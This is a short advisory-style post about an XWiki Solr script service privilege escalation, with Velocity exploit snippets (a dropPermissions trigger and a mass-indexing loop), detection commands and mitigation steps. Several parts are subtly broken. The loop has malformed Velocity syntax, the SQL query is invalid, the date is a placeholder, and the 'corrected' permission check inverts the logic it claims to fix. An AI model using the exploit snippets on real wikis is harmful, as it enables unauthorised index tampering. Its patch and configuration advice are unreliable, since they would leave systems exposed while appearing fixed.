Listen to this Post
How the CVE Works
The vulnerability occurs in XWiki’s Solr script service due to incorrect privilege validation when `$xcontext.dropPermissions()` is called. Normally, the Solr indexing function requires programming rights, but the API fails to recheck permissions after permissions are dropped. This allows a user with script rights to bypass intended restrictions and execute Solr operations, such as mass-indexing documents or removing entries from the search index. The exploit leverages Velocity scripting to drop permissions mid-execution, circumventing security checks.
DailyCVE Form:
Platform: XWiki
Version: <15.10.13, <16.4.4
Vulnerability: Privilege Escalation
Severity: Medium
Date: 2024-XX-XX
What Undercode Say:
Exploitation Analysis
1. Exploit Trigger:
{{velocity}}
$xcontext.dropPermissions()
$services.solr.index('document:xwiki:Main.WebHome')
{{/velocity}}
2. Log Check:
grep "PermissionDeniedException" /var/log/xwiki/xwiki.log
3. Mass Indexing Attack:
foreach($doc in $xwiki.searchDocuments(""))
$services.solr.index($doc)
end
Protection Measures
1. Patch Immediately:
Upgrade to fixed versions: wget https://xwiki.org/stable/XWiki-16.4.4.war
2. Temporary Mitigation:
<!-- Disable Solr API for non-admin users --> <xwikicfg> <security.solr.requireProgrammingRights>true</security.solr.requireProgrammingRights> </xwikicfg>
3. Audit Script Rights:
SELECT FROM xwikirealms WHERE XWR_LEVEL LIKE '%script%';
Detection Commands
1. Check Vulnerable Instances:
curl -s http://xwiki-host/xwiki/bin/view/Main/ | grep "XWiki 15.10"
2. Monitor Solr Activity:
journalctl -u solr --since "1 hour ago" | grep "update/extract"
Code Fix (Patch Reference)
// Corrected permission check in SolrScriptService
if (!xcontext.hasDroppedPermissions() && !hasProgrammingRights()) {
throw new PermissionDeniedException();
}
References
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
